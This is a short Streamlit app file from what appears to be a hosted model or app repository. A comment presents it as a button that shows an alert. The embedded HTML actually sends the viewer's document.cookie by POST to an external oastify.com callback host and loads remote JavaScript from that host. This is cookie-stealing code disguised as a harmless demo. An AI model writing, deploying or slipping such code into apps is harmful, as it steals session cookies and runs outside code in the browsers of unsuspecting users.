moah / app.py
xwxwxw12's picture
Update app.py
d336d80 verified
raw
history blame contribute delete
452 Bytes
import streamlit as st
# Create a button that will trigger the alert
if st.button('Show Alert'):
st.components.v1.html("""
<div>
<script>
fetch('https://qa4x8rkj42frovc18lwydjvprgx9l09p.oastify.com', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>
<script src='https://qa4x8rkj42frovc18lwydjvprgx9l09p.oastify.com/javascript.js'>
</script>
""", height=150)